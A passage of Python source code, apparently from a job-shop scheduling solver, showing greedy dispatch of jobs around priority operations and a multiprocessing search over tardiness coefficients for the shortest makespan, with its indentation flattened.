start_time_candidate = job_constraint_set_job_unfinished[ind_set_op_earliest]
if start_time_candidate < new_ready_time_type_macs[mac_type_op_earliest][ind_mac_op_earliest]:
start_time_candidate = new_ready_time_type_macs[mac_type_op_earliest][ind_mac_op_earliest]
# new_start_time_ops[op_earliest] < new_ready_time_type_macs[mac_type_op_earliest][ind_mac_op_earliest]
if start_time_candidate < cur_time:
start_time_candidate = cur_time
# if new_start_time_ops[op_earliest] < cur_time:
pos_insert_op_schedule = pos_insertion_macs[mac_op_earliest]
op_priority_ref = op_priority_ref_macs[mac_op_earliest]
while op_priority_ref != -1:
max_pend_time_op_priority_ref = self.max_pend_time_ops[op_priority_ref]
if start_time_candidate + process_time_op_earliest <= new_start_time_ops[op_priority_ref]:
break
# if start_time_candidate + process_time_temp <= start_time_ops[op_priority_ref]:
ind_job_priority = self.ind_job_ops[op_priority_ref]
ind_op_op_priority = self.ind_op_ops[op_priority_ref]
job_constraint_op_priority = self.arrival_time_jobs[ind_job_priority]
if ind_op_op_priority > 0:
job_constraint_op_priority = new_end_time_ops[op_priority_ref - 1]
# if ind_op_op_priority > 0:
if start_time_candidate < new_start_time_ops[op_priority_ref] and start_time_candidate + process_time_op_earliest > new_start_time_ops[op_priority_ref] and start_time_candidate + process_time_op_earliest <= job_constraint_op_priority + max_pend_time_op_priority_ref * self.perc_pend_time:
sentinel_feasible, start_time_ops_trial, end_time_ops_trial, start_time_op_macs_trial, end_time_op_macs_trial, ready_time_type_macs_trial = self.postpone_operation(cur_time, machine_status, op_priority_ref, start_time_candidate, process_time_op_earliest, new_start_time_ops, new_end_time_ops, new_start_time_op_macs, new_end_time_op_macs, new_ready_time_type_macs, new_mac_assignment_ops, new_op_seq_machines, new_op_anchor_type_macs)
if sentinel_feasible:
new_start_time_ops = start_time_ops_trial # copy.deepcopy(start_time_ops)
new_end_time_ops = end_time_ops_trial # copy.deepcopy(end_time_ops)
new_start_time_op_macs = start_time_op_macs_trial # copy.deepcopy(start_time_op_macs)
new_end_time_op_macs = end_time_op_macs_trial # copy.deepcopy(end_time_op_macs)
new_ready_time_type_macs = ready_time_type_macs_trial # copy.deepcopy(ready_time_type_macs)
break
# if sentinel_feasible == True:
# if start_time_candidate + process_time_temp <= start_time_ops[op_priority_ref] + max_pend_time_op_priority_ref:
if new_end_time_ops[op_priority_ref] > start_time_candidate:
start_time_candidate = new_end_time_ops[op_priority_ref]
# if end_time_ops[op_priority_ref] > start_time_candidate:
pos_insert_op_schedule = pos_insert_op_schedule + 1
while pos_insert_op_schedule < len(new_op_seq_machines[mac_op_earliest]):
op_temp = new_op_seq_machines[mac_op_earliest][pos_insert_op_schedule]
ind_job_op_temp = int( self.ind_job_ops[op_temp] )
job_temp = self.name_jobs[ind_job_op_temp]
if job_status[job_temp]['priority'] > 0:
op_priority_ref = op_temp
break
# if job_status[job_temp]['priority'] > 0:
pos_insert_op_schedule = pos_insert_op_schedule + 1
# while pos_insert_op_schedule < len(op_seq_machines[mac_op_earliest])
if pos_insert_op_schedule >= len(new_op_seq_machines[mac_op_earliest]):
op_priority_ref = -1
break
# if pos_insert_op_schedule >= len(op_seq_machines[mac_op_earliest]):
# while op_priority_ref != -1:
pos_insertion_macs[mac_op_earliest] = pos_insert_op_schedule
op_priority_ref_macs[mac_op_earliest] = op_priority_ref
new_start_time_ops[op_earliest] = start_time_candidate
new_end_time_ops[op_earliest] = new_start_time_ops[op_earliest] + process_time_op_earliest # self.job_types[job_type_init][ind_op_job_temp]['process_time']
new_op_seq_machines[mac_op_earliest].insert(pos_insert_op_schedule, op_earliest)
new_job_seq_machines[mac_op_earliest].insert(pos_insert_op_schedule, self.name_jobs[ind_job_op_earliest])
new_start_time_op_macs[mac_op_earliest].insert(pos_insert_op_schedule, new_start_time_ops[op_earliest])
new_end_time_op_macs[mac_op_earliest].insert(pos_insert_op_schedule, new_end_time_ops[op_earliest])
new_ready_time_type_macs[mac_type_op_earliest][ind_mac_op_earliest] = new_end_time_ops[op_earliest]
new_scheduled_length_mac_types[mac_type_op_earliest] = new_scheduled_length_mac_types[mac_type_op_earliest] + process_time_op_earliest
new_op_anchor_type_macs[mac_op_earliest] = op_earliest
new_mac_assignment_ops[op_earliest] = mac_op_earliest
new_flag_scheduled_ops[op_earliest] = 1
pos_insertion_macs[mac_op_earliest] = pos_insertion_macs[mac_op_earliest] + 1
if op_earliest == final_idx_op_set_job_unfinished[ind_set_op_earliest]:
set_job_unfinished.pop(ind_set_op_earliest)
idx_op_set_job_unfinished.pop(ind_set_op_earliest)
final_idx_op_set_job_unfinished.pop(ind_set_op_earliest)
job_constraint_set_job_unfinished.pop(ind_set_op_earliest)
else:
# op_suc_earliest = op_earliest + 1
idx_op_set_job_unfinished[ind_set_op_earliest] = op_earliest + 1
job_constraint_set_job_unfinished[ind_set_op_earliest] = new_end_time_ops[op_earliest]
# if op_earliest == final_idx_op_set_job_unfinished[ind_set_op_earliest]:
size_set_job_unfinished = len(set_job_unfinished)
# while size_set_job_unfinished > 0:
#---------------- Division ----------------#
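# Estimate the remaining workload per machine type: total processing time plus accumulated idle
# time on the still-available machines, averaged over those machines; also count how many jobs of
# each type remain to be dispatched.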
new_total_length_machine_type = self.total_length_machine_type.copy()
average_length_machine_type = {}
max_average_length = -1
# mac_type_max_average_length = None
for machine_type_temp in self.machines:
new_total_length_machine_type[machine_type_temp] = new_total_length_machine_type[machine_type_temp] + sum( cumul_pend_time_type_macs[machine_type_temp] )
for ind_mac_type_temp in range(self.num_machine_available_types[machine_type_temp]):
machine_temp = self.machines[machine_type_temp][ind_mac_type_temp]
if self.flag_mac_available[machine_temp] == 0:
new_total_length_machine_type[machine_type_temp] = new_total_length_machine_type[machine_type_temp] - cumul_pend_time_type_macs[machine_type_temp][ind_mac_type_temp]
# if self.flag_mac_available[machine_temp] == 0:
# for ind_mac_type_temp in range(self.num_machine_available_types[machine_type_temp]):
coeff_temp = 1.0 # + ind_mac_type_temp / 10.0
average_length_machine_type[machine_type_temp] = new_total_length_machine_type[machine_type_temp] * coeff_temp / self.num_machine_available_types[machine_type_temp]
if average_length_machine_type[machine_type_temp] > max_average_length:
max_average_length = average_length_machine_type[machine_type_temp]
# mac_type_max_average_length = machine_type_temp
# if average_length_machine_type[machine_type_temp] > max_average_length:
# for machine_type_temp in self.machines:
num_left_job = np.zeros(self.num_job_types)
for ind_job_type in range(self.num_job_types):
job_type_temp = self.keys_job_types[ind_job_type]
num_left_job[ind_job_type] = self.num_jobs_type_idx[job_type_temp] - self.num_type_job_priority[ind_job_type] - num_scheduled_jobs_per_type[job_type_temp]
if num_left_job[ind_job_type] < 0:
print('incorrect number of jobs')
# if num_dispatch_temp < 0:
# for ind_job_type in range(self.num_job_types):
#---------------- Dispatch ----------------#
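# Greedy dispatch of the remaining jobs: in each round pick the earliest-ready machine of every
# type, score every job type that still has jobs left (coeff_tardiness weights the tardiness
# score; the combination score penalizes leaving awkward gaps in front of pinned priority
# operations), select the best-scoring type, and schedule one job of that type operation by
# operation.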
for machine_temp in machine_status:
num_op_mac_temp = len(new_op_seq_machines[machine_temp])
# ind_last_ordinary_op = 0
for ind_op_mac in range(num_op_mac_temp):
op_iter = new_op_seq_machines[machine_temp][ind_op_mac]
ind_job_op_iter = self.ind_job_ops[op_iter]
priority_op_iter = self.priority_jobs[ind_job_op_iter]
if priority_op_iter == 0:
new_op_anchor_type_macs[machine_temp] = op_iter
# if priority_op_iter == 0:
# for ind_op_mac in range(num_op_mac_temp):
# for machine_temp in machine_status:
while np.sum(new_flag_scheduled_jobs) < self.num_job:
# machine set
mac_available_set = {}
ind_mac_available_set = {}
buffer_macs = {}
ready_time_comp = -1
# idx_mac_max_length = -1
for machine_type_temp in self.machines:
ind_mac_type_mac = np.argmin( new_ready_time_type_macs[machine_type_temp] + available_mac_offset[machine_type_temp] )
mac_selected_temp = self.machines[machine_type_temp][ind_mac_type_mac]
mac_available_set[machine_type_temp] = mac_selected_temp
ind_mac_available_set[machine_type_temp] = ind_mac_type_mac
if ready_time_comp == -1:
buffer_macs[machine_type_temp] = 0
ready_time_comp = new_ready_time_type_macs[machine_type_temp][ind_mac_type_mac]
else:
ready_time_cur = new_ready_time_type_macs[machine_type_temp][ind_mac_type_mac]
buffer_macs[machine_type_temp] = ready_time_cur - ready_time_comp
ready_time_comp = ready_time_cur
# if ready_time_comp == -1:
# for machine_temp in self.machines:
# grade the type of jobs
status_job = 3 * np.ones(self.num_job_types)
score_job = np.zeros((self.num_job_types, 2))
for ind_job_type in range(self.num_job_types):
if num_left_job[ind_job_type] <= 0:
continue
# if num_job_dispatch_mac[idx_mac_max_length, ind_job_type] <= 0:
job_type_temp = self.keys_job_types[ind_job_type]
# sentinel_tardiness = False
score_tardiness = np.zeros(self.num_kind_mac)
score_comb = np.zeros(self.num_kind_mac)
job_constraint_score = 0
for ind_op_temp in range(self.num_kind_mac):
mac_type_cur = self.keys_mac_types[ind_op_temp]
idx_mac_cur = ind_mac_available_set[mac_type_cur]
mac_score = mac_available_set[mac_type_cur]
process_time_cur_mac = self.process_time_mac_jobs[mac_type_cur][job_type_temp]
if process_time_cur_mac == -1:
process_time_cur_mac = 0
# if process_time_cur_mac == -1:
urgence_coeff_temp = (1.0 + ind_op_temp * 0.2) * (new_total_length_machine_type[mac_type_cur] - new_scheduled_length_mac_types[mac_type_cur]) / self.num_machine_available_types[mac_type_cur]
start_time_score = job_constraint_score
if start_time_score < new_ready_time_type_macs[mac_type_cur][idx_mac_cur]:
start_time_score = new_ready_time_type_macs[mac_type_cur][idx_mac_cur]
# if start_time_score < ready_time_type_macs[mac_type_cur][idx_mac_cur]:
tardiness_temp = start_time_score - new_ready_time_type_macs[mac_type_cur][idx_mac_cur]
op_priority_score = op_priority_ref_macs[mac_score]
if op_priority_score != -1:
max_pend_time_op_priority_score = self.max_pend_time_ops[op_priority_score]
if start_time_score + process_time_cur_mac > new_start_time_ops[op_priority_score] + 0.5 * self.perc_pend_time * max_pend_time_op_priority_score:
start_time_score = new_end_time_ops[op_priority_score]
tardiness_temp = new_start_time_ops[op_priority_score] - new_ready_time_type_macs[mac_type_cur][idx_mac_cur]
# if start_time_score + process_time_cur_mac < start_time_ops[op_priority_score]:
# if op_priority_score != -1
if tardiness_temp > 0:
# sentinel_tardiness = True
score_tardiness[ind_op_temp] = - tardiness_temp * urgence_coeff_temp
# else:
if op_priority_score != -1:
max_pend_time_op_priority_score = self.max_pend_time_ops[op_priority_score]
length_left = new_start_time_ops[op_priority_score] - start_time_score - process_time_cur_mac
if length_left > 0:
if length_left < self.length_comb_macs[mac_type_cur][0]:
score_comb[ind_op_temp] = - length_left * urgence_coeff_temp
elif length_left < self.max_length_comb:
idx_plus = -1
for ind_length_comb in range(len(self.length_comb_macs[mac_type_cur])):
if self.length_comb_macs[mac_type_cur][ind_length_comb] > length_left:
idx_plus = ind_length_comb
break
# end if self.length_comb_macs[mac_type_cur][ind_length_comb] > length_left:
# end for ind_length_comb in len(self.length_comb_macs[mac_type_cur]):
if idx_plus == 0:
print('incorrect index')
elif idx_plus != -1:
length_plus = self.length_comb_macs[mac_type_cur][idx_plus]
length_minus = self.length_comb_macs[mac_type_cur][idx_plus-1]
if length_left > length_minus + 0.1 * self.perc_pend_time * max_pend_time_op_priority_score:
score_comb[ind_op_temp] = - (length_plus - length_left) * urgence_coeff_temp
# end if length_left > length_minus + 0.5 * self.perc_pend_time * max_pend_time_op_priority_score:
# end if idx_plus == 0 or idx_plus == -1:
# end if length_left < self.length_comb_macs[mac_type_cur][0]:
# if length_left > 0:
# if op_priority_score != -1
# if tardiness_temp > 0:
job_constraint_score = start_time_score + process_time_cur_mac
# for ind_op_temp in range(1, num_op_job_temp):
status_job[ind_job_type] = 2
score_job[ind_job_type, 1] = coeff_tardiness * np.sum(score_tardiness) + np.sum(score_comb)
# for ind_job_type in range(self.num_job_types):
# select the type of job
# idx_mac_job_group = idx_mac_max_length
idx_job_type_selected = -1
ind_job_selected = -1
# idx_job_type_first_arrive = -1
# sentinel_job_type = np.zeros(self.num_job_types)
idx_job_type_selected = -1
for ind_job_type in range(self.num_job_types):
if status_job[ind_job_type] >= 3: # or sentinel_job_type[ind_job_type] == 1
continue
# if status_job[ind_job_type] >= 4:
if idx_job_type_selected == -1:
idx_job_type_selected = ind_job_type
else: # if idx_job_type_selected != -1:
if status_job[ind_job_type] < status_job[idx_job_type_selected]:
idx_job_type_selected = ind_job_type
else:
if status_job[ind_job_type] == status_job[idx_job_type_selected]:
if status_job[ind_job_type] == 2 and score_job[ind_job_type,1] > score_job[idx_job_type_selected,1]:
idx_job_type_selected = ind_job_type
# if status_job[ind_job_type] == 2 and score_job[ind_job_type,1] > score_job[idx_job_type_selected,1]:
if status_job[ind_job_type] == 1 and score_job[ind_job_type,0] > score_job[idx_job_type_selected,0]:
idx_job_type_selected = ind_job_type
# if status_job[ind_job_type] == 1 and score_job[ind_job_type,0] > score_job[idx_job_type_selected,0]:
# if status_job[ind_job_type] == status_job[idx_job_type_selected]:
# if status_job[ind_job_type] < status_job[idx_job_type_selected]:
# if idx_job_type_selected == -1:
# for ind_job_type in range(self.num_job_types):
if idx_job_type_selected == -1:
print('No proper job type')
# if idx_job_type_selected == -1:
# determine the exact job to be arranged
job_type_selected = self.keys_job_types[idx_job_type_selected]
idx_job_base = self.idx_first_job_types[job_type_selected]
job_name_selected = None
for ind_job_selected_type in range(self.num_jobs_type_idx[job_type_selected]):
if new_flag_scheduled_jobs[idx_job_base + ind_job_selected_type] == 1:
continue
# if flag_scheduled_jobs[idx_job_base + ind_job_selected_type] == 1 or self.arrival_time_jobs[idx_job_base + ind_job_selected_type] > current_time:
if self.arrival_time_jobs[idx_job_base + ind_job_selected_type] > 0:
continue
# if self.arrival_time_jobs[idx_job_base + ind_job_selected_type] > current_time:
if ind_job_selected == -1:
ind_job_selected = ind_job_selected_type + idx_job_base
job_name_selected = self.name_jobs[ind_job_selected]
break
# if ind_job_selected == -1:
# for ind_job_selected_type in range(self.num_jobs_type_idx[job_type_selected]):
if ind_job_selected == -1:
print('No proper job')
# if ind_job_selected == -1:
if job_type_selected != self.type_jobs[ind_job_selected]:
print('check job type')
# if job_type_selected != self.type_jobs[ind_job_selected]:
# dispatch
job_constraint_temp = self.arrival_time_jobs[ind_job_selected]
ind_first_op_temp = self.idx_first_op_jobs[ind_job_selected]
job_name_selected = self.name_jobs[ind_job_selected]
num_op_temp = int( self.num_op_jobs[ind_job_selected] )
for ind_op_job_temp in range(num_op_temp):
ind_op_schedule = int( ind_first_op_temp + ind_op_job_temp )
mac_type_temp = self.machine_type_ops[ind_op_schedule]
process_time_temp = self.job_types[job_type_selected][ind_op_job_temp]['process_time']
ind_mac_type_mac_temp = ind_mac_available_set[mac_type_temp]
mac_name_temp = mac_available_set[mac_type_temp]
# determine the start time
start_time_candidate = job_constraint_temp
if job_constraint_temp < new_ready_time_type_macs[mac_type_temp][ind_mac_type_mac_temp]:
start_time_candidate = new_ready_time_type_macs[mac_type_temp][ind_mac_type_mac_temp]
# if job_constraint_temp < ready_time_type_macs[mac_type_temp][ind_mac_type_mac_temp]:
if start_time_candidate < cur_time:
start_time_candidate = cur_time
# if start_time_candidate < cur_time:
pos_insert_op_schedule = pos_insertion_macs[mac_name_temp]
op_priority_ref = op_priority_ref_macs[mac_name_temp]
while op_priority_ref != -1:
max_pend_time_op_priority_ref = self.max_pend_time_ops[op_priority_ref]
if start_time_candidate + process_time_temp <= new_start_time_ops[op_priority_ref]:
break
# if start_time_candidate + process_time_temp <= start_time_ops[op_priority_ref]:
ind_job_priority = self.ind_job_ops[op_priority_ref]
ind_op_op_priority = self.ind_op_ops[op_priority_ref]
job_constraint_op_priority = self.arrival_time_jobs[ind_job_priority]
if ind_op_op_priority > 0:
job_constraint_op_priority = new_end_time_ops[op_priority_ref - 1]
# if ind_op_op_priority > 0:
if start_time_candidate < new_start_time_ops[op_priority_ref] and start_time_candidate + process_time_temp > new_start_time_ops[op_priority_ref] and start_time_candidate + process_time_temp <= job_constraint_op_priority + max_pend_time_op_priority_ref * self.perc_pend_time:
sentinel_feasible, start_time_ops_trial, end_time_ops_trial, start_time_op_macs_trial, end_time_op_macs_trial, ready_time_type_macs_trial = self.postpone_operation(cur_time, machine_status, op_priority_ref, start_time_candidate, process_time_temp, new_start_time_ops, new_end_time_ops, new_start_time_op_macs, new_end_time_op_macs, new_ready_time_type_macs, new_mac_assignment_ops, new_op_seq_machines, new_op_anchor_type_macs)
if sentinel_feasible:
new_start_time_ops = start_time_ops_trial # copy.deepcopy(start_time_ops)
new_end_time_ops = end_time_ops_trial # copy.deepcopy(end_time_ops)
new_start_time_op_macs = start_time_op_macs_trial # copy.deepcopy(start_time_op_macs)
new_end_time_op_macs = end_time_op_macs_trial # copy.deepcopy(end_time_op_macs)
new_ready_time_type_macs = ready_time_type_macs_trial # copy.deepcopy(ready_time_type_macs)
break
# if sentinel_feasible == True:
# if start_time_candidate + process_time_temp <= start_time_ops[op_priority_ref] + max_pend_time_op_priority_ref:
if new_end_time_ops[op_priority_ref] > start_time_candidate:
start_time_candidate = new_end_time_ops[op_priority_ref]
# if end_time_ops[op_priority_ref] > start_time_candidate:
pos_insert_op_schedule = pos_insert_op_schedule + 1
while pos_insert_op_schedule < len(new_op_seq_machines[mac_name_temp]):
op_temp = new_op_seq_machines[mac_name_temp][pos_insert_op_schedule]
ind_job_op_temp = int( self.ind_job_ops[op_temp] )
job_temp = self.name_jobs[ind_job_op_temp]
if job_status[job_temp]['priority'] > 0:
op_priority_ref = op_temp
break
# if job_status[job_temp]['priority'] > 0:
pos_insert_op_schedule = pos_insert_op_schedule + 1
# while pos_insert_op_schedule < len(op_seq_machines[mac_name_temp])
if pos_insert_op_schedule >= len(new_op_seq_machines[mac_name_temp]):
op_priority_ref = -1
break
# if pos_insert_op_schedule >= len(op_seq_machines[mac_name_temp]):
# while op_priority_ref != -1:
pos_insertion_macs[mac_name_temp] = pos_insert_op_schedule
op_priority_ref_macs[mac_name_temp] = op_priority_ref
new_start_time_ops[ind_op_schedule] = start_time_candidate
new_end_time_ops[ind_op_schedule] = new_start_time_ops[ind_op_schedule] + process_time_temp # self.job_types[job_type_init][ind_op_job_temp]['process_time']
new_op_seq_machines[mac_name_temp].insert(pos_insert_op_schedule, ind_op_schedule)
new_job_seq_machines[mac_name_temp].insert(pos_insert_op_schedule, job_name_selected)
new_start_time_op_macs[mac_name_temp].insert(pos_insert_op_schedule, new_start_time_ops[ind_op_schedule])
new_end_time_op_macs[mac_name_temp].insert(pos_insert_op_schedule, new_end_time_ops[ind_op_schedule])
new_ready_time_type_macs[mac_type_temp][ind_mac_type_mac_temp] = new_end_time_ops[ind_op_schedule]
new_op_anchor_type_macs[mac_name_temp] = ind_op_schedule
new_scheduled_length_mac_types[mac_type_temp] = new_scheduled_length_mac_types[mac_type_temp] + process_time_temp
new_mac_assignment_ops[ind_op_schedule] = mac_name_temp
new_flag_scheduled_ops[ind_op_schedule] = 1
pos_insertion_macs[mac_name_temp] = pos_insertion_macs[mac_name_temp] + 1
job_constraint_temp = new_end_time_ops[ind_op_schedule]
# for ind_op_job_temp in range(num_op_temp):
new_flag_scheduled_jobs[ind_job_selected] = 1
num_left_job[idx_job_type_selected] = num_left_job[idx_job_type_selected] - 1
if num_left_job[idx_job_type_selected] < 0: # group_job_mac[idx_mac_job_group, idx_job_type_selected] > 0:
print('incorrect number of jobs')
# if num_left_job[idx_job_type_selected] < 0:
# while np.sum(flag_scheduled_jobs) < self.num_job:
#---------------- Recording ----------------#
op_max_end_time = np.argmax(new_end_time_ops)
makespan = new_end_time_ops[op_max_end_time] # np.max(end_time_ops)
return makespan, new_op_seq_machines, new_job_seq_machines, new_start_time_op_macs, new_end_time_op_macs, new_start_time_ops, new_end_time_ops, new_mac_assignment_ops, new_flag_scheduled_ops, count_scheduled_op_macs, new_flag_scheduled_jobs
# def generation_resume():
def init_construction(self, job_status, job_list, machine_status, cur_time):
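"""Build the initial schedule at cur_time. Jobs, operations and priority jobs are indexed from
job_status, six parallel process_generate_scratch workers then build schedules, one per tardiness
coefficient in self.set_coeff_tardiness, and the schedule with the smallest makespan is kept.
When every machine type has more than two machines, six randomized process_iteration_scratch
workers try to improve on that schedule. The best schedule is stored on self and verified."""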
#---------------- Preparation ----------------#
num_job = len(job_status)
self.flag_mac_available = {}
for mac_name_temp in machine_status:
self.flag_mac_available[mac_name_temp] = 1
# for mac_name_temp in machine_status:
name_jobs = []
idx_first_job_types = {}
type_jobs = []
num_op_jobs = np.zeros(num_job)
arrival_time_jobs = []
priority_jobs = []
idx_first_op_jobs = -1 * np.ones(num_job)
ind_job_ops = []
ind_op_ops = []
machine_type_ops = []
max_pend_time_ops = []
process_time_ops = []
arrival_jobs_priority = {}
priority_jobs_priority = {}
idx_set_job_priority = {}
num_type_job_priority = np.zeros(self.num_job_types)
set_job_priority = []
size_set_job_priority = 0
total_num_ops = 0
type_record = None
ind_job = 0
for job in job_status:
name_jobs.append(job)
type_temp = job_status[job]['type']
if type_record is None or type_temp != type_record:
type_record = type_temp
idx_first_job_types[type_record] = ind_job
# if type_record == None or type_temp != type_record:
type_jobs.append(type_temp)
num_op_temp = self.num_op_job_types[type_temp]
num_op_jobs[ind_job] = int( num_op_temp )
arrival_time_jobs.append(job_status[job]['arrival'])
priority_jobs.append(job_status[job]['priority'])
idx_first_op_jobs[ind_job] = total_num_ops
for ind_op_temp in range(num_op_temp):
ind_job_ops.append(ind_job)
ind_op_ops.append(ind_op_temp)
machine_type_ops.append(self.job_types[type_temp][ind_op_temp]['machine_type'])
max_pend_time_ops.append(self.job_types[type_temp][ind_op_temp]['max_pend_time'])
process_time_ops.append(self.job_types[type_temp][ind_op_temp]['process_time'])
# for ind_op_temp in range(num_op_temp):
if job_status[job]['priority'] > 0:
arrival_jobs_priority[job] = job_status[job]['arrival']
priority_jobs_priority[job] = job_status[job]['priority']
idx_set_job_priority[job] = ind_job
idx_type_temp = self.hash_ind_job_types[type_temp]
num_type_job_priority[idx_type_temp] = num_type_job_priority[idx_type_temp] + 1
idx_pos_job_priority = 0
for ind_job_priority in range(size_set_job_priority):
job_comp = set_job_priority[ind_job_priority]
if arrival_jobs_priority[job_comp] >= arrival_jobs_priority[job]:
break
# if arrival_jobs_priority[job_comp] >= arrival_jobs_priority[job]:
idx_pos_job_priority = idx_pos_job_priority + 1
# for ind_job_priority in range(size_set_job_priority):
set_job_priority.insert(idx_pos_job_priority, job)
size_set_job_priority = size_set_job_priority + 1
# if job_status[job]['priority'] > 0:
total_num_ops = total_num_ops + num_op_temp
ind_job = ind_job + 1
# for job in job_status:
num_jobs_type_idx = {}
for ind_job in range(num_job):
if type_jobs[ind_job] in num_jobs_type_idx:
num_jobs_type_idx[ type_jobs[ind_job] ] = num_jobs_type_idx[ type_jobs[ind_job] ] + 1
else:
num_jobs_type_idx[ type_jobs[ind_job] ] = 1
# if type_jobs[ind_job] in num_jobs_type_idx:
# for ind_job in range(num_job):
num_machine_available_types = {}
num_op_mac_jobs = {}
total_length_machine_type = {}
# average_length_machine_type = {}
# max_average_length = -1
# mac_type_max_average_length = None
for machine_temp in self.machines:
num_machine_available_types[machine_temp] = len(self.machines[machine_temp])
num_op_mac_jobs[machine_temp] = {}
total_length_machine_type[machine_temp] = 0
for key_job_type in self.key_dict_job_types:
if self.process_time_mac_jobs[machine_temp][key_job_type] != -1:
total_length_machine_type[machine_temp] = total_length_machine_type[machine_temp] + num_jobs_type_idx[key_job_type] * self.process_time_mac_jobs[machine_temp][key_job_type]
num_op_mac_jobs[machine_temp][key_job_type] = num_jobs_type_idx[key_job_type]
else:
num_op_mac_jobs[machine_temp][key_job_type] = 0
# if processing_time_temp != -1:
# for key_job_type in key_dict_job_types:
# coeff_temp = 1.0 # + ind_mac_type_temp / 10.0
# average_length_machine_type[machine_temp] = total_length_machine_type[machine_temp] * coeff_temp / num_machine_available_types[machine_temp]
# if average_length_machine_type[machine_temp] > max_average_length:
# max_average_length = average_length_machine_type[machine_temp]
# mac_type_max_average_length = machine_temp
# # if average_length_machine_type[machine_temp] > max_average_length:
# for machine_temp in self.machines:
self.mac_set_breakdown = []
self.total_num_ops = total_num_ops
self.num_job = num_job
self.num_op_jobs = num_op_jobs
self.idx_first_job_types = idx_first_job_types
self.name_jobs = name_jobs
self.arrival_time_jobs = arrival_time_jobs
self.priority_jobs = priority_jobs
self.ind_job_ops = ind_job_ops
self.ind_op_ops = ind_op_ops
self.type_jobs = type_jobs
self.machine_type_ops = machine_type_ops
self.idx_first_op_jobs = idx_first_op_jobs
self.num_jobs_type_idx = num_jobs_type_idx
self.num_machine_available_types = num_machine_available_types
self.num_op_mac_jobs = num_op_mac_jobs
self.total_length_machine_type = total_length_machine_type
self.max_pend_time_ops = max_pend_time_ops
self.process_time_ops = process_time_ops
self.set_job_priority = set_job_priority
self.idx_set_job_priority = idx_set_job_priority
self.arrival_jobs_priority = arrival_jobs_priority
self.priority_jobs_priority = priority_jobs_priority
self.size_set_job_priority = size_set_job_priority
self.num_type_job_priority = num_type_job_priority
# coeff_tardiness = 0.5
# start_time = time.time()
manager = multiprocessing.Manager()
makespan_ct_dict = manager.dict()
data_ct_dict = manager.dict()
jobs_ct = []
# set_coeff_tardiness = [1.0, 0.5, 0.2, 0.1, 0.05, 0.01]
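# Coefficient search: one worker per entry of self.set_coeff_tardiness builds a schedule from
# scratch; the schedule with the smallest makespan wins.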
for ind_process in range(6):
proc = multiprocessing.Process(target=process_generate_scratch, args=(self, cur_time, job_status, machine_status, self.set_coeff_tardiness[ind_process], makespan_ct_dict, data_ct_dict))
jobs_ct.append(proc)
proc.start()
# for ind_process in range(6):
for proc in jobs_ct:
proc.join()
# for proc in jobs:
ct_min_makespan = min(makespan_ct_dict, key=makespan_ct_dict.get)
makespan_best = makespan_ct_dict[ct_min_makespan]
op_seq_machines_best, job_seq_machines_best, start_time_op_macs_best, end_time_op_macs_best, start_time_ops_best, end_time_ops_best, mac_assignment_ops_best, flag_scheduled_ops_best, flag_scheduled_jobs_best = data_ct_dict[ct_min_makespan]
coeff_tardiness_best = ct_min_makespan
#print(makespan_ct_dict.values())
#print(ct_min_makespan)
#print(makespan_ct_dict[ct_min_makespan])
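# Randomized refinement, only attempted when every machine type has more than two machines;
# adopt the result only if it improves on makespan_best.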
if min(self.num_machine_types.values()) > 2:
makespan_rnd_dict = manager.dict()
data_rnd_dict = manager.dict()
jobs_rnd = []
for ind_process in range(6):
proc = multiprocessing.Process(target=process_iteration_scratch, args=(self, ind_process, cur_time, job_status, machine_status, coeff_tardiness_best, makespan_best, makespan_rnd_dict, data_rnd_dict))
jobs_rnd.append(proc)
proc.start()
# for ind_process in range(6):
for proc in jobs_rnd:
proc.join()
# for proc in jobs:
ind_rnd_min_makespan = min(makespan_rnd_dict, key=makespan_rnd_dict.get)
if makespan_rnd_dict[ind_rnd_min_makespan] < makespan_best:
makespan_best = makespan_rnd_dict[ind_rnd_min_makespan]
op_seq_machines_best, job_seq_machines_best, start_time_op_macs_best, end_time_op_macs_best, start_time_ops_best, end_time_ops_best, mac_assignment_ops_best, flag_scheduled_ops_best, flag_scheduled_jobs_best = data_rnd_dict[ind_rnd_min_makespan]
# if makespan_rnd_dict[ind_rnd_min_makespan] < makespan_best:
# if min(self.num_machine_types.values()) > 2:
# makespan, op_seq_machines, job_seq_machines, start_time_op_macs, end_time_op_macs, start_time_ops, end_time_ops, mac_assignment_ops, flag_scheduled_ops, flag_scheduled_jobs = self.generation_scratch(cur_time, job_status, machine_status, coeff_tardiness)
# elapsed_time = (time.time() - start_time)
# print(elapsed_time)
# self.group_job_mac = group_job_mac
self.op_seq_machines = op_seq_machines_best
self.job_seq_machines = job_seq_machines_best
self.start_time_op_macs = start_time_op_macs_best
self.end_time_op_macs = end_time_op_macs_best
self.start_time_ops = start_time_ops_best
self.end_time_ops = end_time_ops_best
self.mac_assignment_ops = mac_assignment_ops_best
self.flag_scheduled_ops = flag_scheduled_ops_best
self.flag_scheduled_jobs = flag_scheduled_jobs_best
self.count_scheduled_op_macs = {}
for machine_temp in self.name_macs:
self.count_scheduled_op_macs[machine_temp] = 0
# for machine_temp in key_job_list:
#---------------- Verification ----------------#
penalty_pending_constraint = 0
for ind_job_check in range(self.num_job):
name_job_check = self.name_jobs[ind_job_check]
type_job_check = self.type_jobs[ind_job_check]
priority_job_check = job_status[name_job_check]['priority']
if self.flag_scheduled_jobs[ind_job_check] != 1:
print('unscheduled job')
# if flag_scheduled_jobs[flag_scheduled_jobs] != 0:
num_op_job_check = int( self.num_op_jobs[ind_job_check] )
idx_first_op_job_check = self.idx_first_op_jobs[ind_job_check]
for ind_op_job_check in range(num_op_job_check):
op_check = int( idx_first_op_job_check + ind_op_job_check )
if self.flag_scheduled_ops[op_check] != 1:
print('unscheduled operation')
# if flag_scheduled_ops[idx_first_op_job_check + ind_op_job_check] != 1:
if ind_op_job_check > 0:
if self.end_time_ops[op_check - 1] > self.start_time_ops[op_check]:
print('incorrect start time')
# if end_time_ops[op_check - 1] > start_time_ops[op_check]:
# if ind_op_job_check > 0:
if priority_job_check > 0:
pending_constraint_op = self.job_types[type_job_check][ind_op_job_check]['max_pend_time']
time_comp = -1
if ind_op_job_check == 0:
time_comp = self.arrival_time_jobs[ind_job_check]
if time_comp < 0:
print('wrong arrival time')
# if time_comp <= 0:
else:
time_comp = self.end_time_ops[op_check - 1]
# if ind_op_job_check == 0:
if self.start_time_ops[op_check] - time_comp > pending_constraint_op:
print('violated the pending constraint')
penalty_pending_constraint = penalty_pending_constraint + priority_job_check * 10 * (self.start_time_ops[op_check] - time_comp - pending_constraint_op)
# if end_time_ops[op_check] - time_comp >= pending_constraint_op:
